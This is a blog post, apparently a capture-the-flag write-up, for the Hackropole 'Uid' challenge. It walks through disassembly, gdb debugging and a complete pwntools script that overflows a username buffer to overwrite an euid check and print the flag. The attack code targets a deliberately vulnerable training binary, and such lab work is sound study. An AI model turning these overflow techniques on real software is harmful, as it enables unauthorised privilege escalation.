Post

Uid | Hackropole

Posted Updated
By Debrunbaix
1 min read
Uid | Hackropole

Uid

Ressources

Analysis

Code reading

1
2
3
4
5
6
7
8
9
10

call   0x1050 <geteuid@plt>
mov    DWORD PTR [rbp-0x4],eax
...
cmp    DWORD PTR [rbp-0x4],0x0
jne    0x11d1 <main+92>
lea    rdi,[rip+0xe48]        # 0x2012
call   0x1030 <system@plt>
jmp    0x11dd <main+104>
lea    rdi,[rip+0xe47]        # 0x201f
call   0x1030 <system@plt>

1
2
3
4
5

x/s $rdi
0x55555555601f: "cat flop.txt"

x/s $rdi-0x9
0x555555556016: "flag.txt"

Just after the scanf to get the user input, it compare the variable that contain the euid with 0x0, if it is zero, we get the flag, else, we get the flop.

Exploit

Our objective is to change the value of euid by an overflow of the user input.

1
2
3
4
5
6
7
8

b *main+72
Breakpoint 1 at 0x11bd

r
username: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBCCCCCCCC

x/x $rbp-0x4
0x7fffffffd95c: 0x42424242

we can control the euid variable.

We can create the payload like this

1
2
3

payload =   b""
payload +=  b"A" * 44
payload +=  b"\x00"

Complete exploit :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40

#!/usr/bin/env python3

from pwn import *
import argparse

context.arch =  "amd64"

def get_args():
    parser = argparse.ArgumentParser(add_help=False)
    parser.add_argument("-?", "--help",     action="help", help="show this help message and exit")
    parser.add_argument("-l", "--local",    help="File path to the binary", type=str)
    parser.add_argument("-p", "--port",     help="Remote port", type=int)
    parser.add_argument("-h", "--host",     help="Remote host", type=str)

    args = parser.parse_args()

    return args

def main(args):
    if args.local:
        target = process(args.local)
    elif args.host and args.port:
        target = remote(args.host, args.port)

    payload =   b""
    payload +=  b"A" * 44
    payload +=  b"\x00"

    user_input = target.recvuntil(b"username: ")
    print(f"[<] {user_input}")

    print(f"[>] {payload}")
    target.sendline(payload)
    print(target.recvline())

    exit(0)

if __name__ == "__main__":
    args = get_args()
    main(args)

Getting flag

1
2
3
4
5
6

./exploit.py -h 127.0.0.1 -p 4000
[+] Opening connection to 127.0.0.1 on port 4000: Done
[<] b'username: '
[>] b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x00'
b'FCSC{3ce9............................................6469}\n'
[*] Closed connection to 127.0.0.1 port 4000
hackropole, Pwn
hackropole Pwn BoF
This post is licensed under CC BY 4.0 by the author.